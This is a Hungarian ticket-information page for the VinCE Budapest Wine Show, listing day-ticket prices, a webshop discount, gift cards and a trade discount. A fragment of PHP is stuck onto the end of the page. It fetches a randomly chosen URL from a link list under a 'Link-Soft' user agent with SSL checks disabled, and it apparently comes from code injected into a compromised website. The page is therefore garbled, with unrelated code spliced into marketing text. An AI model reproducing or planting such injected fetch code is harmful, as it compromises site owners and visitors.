Jegyinfó


A gyorsaság fontos, a jegyek elfogynak!
BelépésMivel a 2014-es és 2015-ös VinCE Budapest Wine Show-ra egyaránt elfogytak a jegyek, a 2015-ös rendezvényünkön helyszíni jegyértékesítés már egyáltalán nem volt, javasoljuk, hogy mielőbb váltsa meg jegyét, nehogy kimaradjon Kelet-Közép Európa legnagyobb presztízsű boreseményéből.

Amennyiben nem szeretne lemaradni a legizgalmasabb boros programokról és a VinCE Budapest legrissebb híreiről, iratkozzon fel hírlevelünkre! Hetente jelentkezük borajánlattal, programtippekkel és a VinCE Budapest legizgalmasabb híreivel. Feliratkozás itt.

A gyorsaság fontos, a jegyek drágulnak!

timeisrunningÉrdemes minél hamarabb megvásárolnia belépőjét, ugyanis a VinCE Budapest-jegyek ára idővel emelkedik.
A jegyárak alakulása:
Csütörtök (március 3.) szakmai napijegy most:  7000 Ft
Péntek (március 4.) napijegy most: 14 000 Ft
Péntek (március 4.) szakmai napijegy most:  7000 Ft
Szombat (március 5.)napijegy most: 16 000 Ft

 

Újdonság: most a jegyárból  2000 Ft levásárolható!
webshopA VinCE Budapest Wine Show mostantól VinCE Budapest Wine Show + Shop, ugyanis amellett, hogy vendégeink több mint 1000 bort kóstolhatnak egy jeggyel, a kóstolás alapján kiválasztott borokat könnyen és gyorsan meg is rendelhetik nálunk!
– Nincs zsákba macska: hiszen Ön rendelés előtt végigkóstolhatja a borokat.
– Nincs cipekedés: hiszen tudjuk, Ön nem azért jön a VinCE Budapestre, hogy palackokat cipeljen naphosszat. Ön csak egy-két kattintással rendel, mi pedig intézzük a házhoz szállítást!
– Vannak viszont remek árak, ugyanis kiállítóink a rendezvény idejére különleges kedvezményekkel kedveskednek vendégeinknek.
A megrendelhető borok listáját március 1-jén közzétesszük!
A házhoz szállítás magyarországi lakcímre vonatkozik, külföldi lakcím esetén keressen minket, hogy megtaláljuk a megoldást!

Ajándékozzon VinCE Kártyát!
VinCE KártyaRagaszkodik a “papírformához”, vagyis online jegy helyett szeretne kézzel fogható, exkluzív belépőt ajándékozni szeretteinek? Semmi akadálya! Írja meg nekünk, hogy pénteki vagy szombati napra kéri-e a jegyet, és azt is írja meg, hogy hány jegyet kér a választott napra vagy napokra. Kérjük, adja meg számlázási adatait (név és lakcím), hogy számlaadási kötelezettségünket teljesíthessük. Válasz e-mailben megküldjük Önnek a számlaszámot, amelyre kérjük, utalja el a jegyek árát. Amint Ön elküldi az utalási bizonylatot vagy beérkezik hozzánk az összeg, postázzuk a belépőket.
Újdonság: mostantól a nyomtatott jeggyel is lehet mesterkurzusjegyeket és workshopjegyeket vásárolni! Az ajándékozott a VinCE Kártyán olvasható kóddal be tud regisztrálni jegyvásárló felületünkre, és tetszés szerint bővítheti napijegyét mesterkurzusjegyekkel vagy workshopjegyekkel.
A VinCE Kártya szakmai kedvezménnyel nem igényelhető.

 

Szakmai vendégeinknek most is 50% kedvezmény
liliacNekünk fontos, hogy a borszakma és a HoReCa szektor tagjai mind ott lehessenek, éppen ezért ezen vendégeinknek – azaz a szakmabelieknek – 50%-os kedvezményt biztosítunk a rendezvény első vagy második napjára, azaz március 3-ára vagy 4-ére. A kedvezmény annak jár, aki főállásban, tehát hivatásszerűen borszakíró, borkereskedő, sommelier, borászat, borászat munkatársa vagy a HoReCa szektor főállású tagja. A szakmai kedvezmény igényléséhez kérjük, írjon az info@vincemagazin.hu címre. Írja meg:
– nevét, e-mail címét,
– munkahelyét, pozícióját,
– munkahelye címét, weboldalát.
Köszönjük! A megítélt kedvezmény minden esetben névre szóló, tehát amennyiben egy munkahelyről több személy szeretne kedvezményt, úgy minden egyes jelentkező adatait kérjük címünkre megküldeni. Pozitív elbírásálás esetén megküldünk egy egyedi kódot, amellyel szakmai vendégként tud regisztrálni jegyvásárló oldalunkon.

Jegyvásárlás itt


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>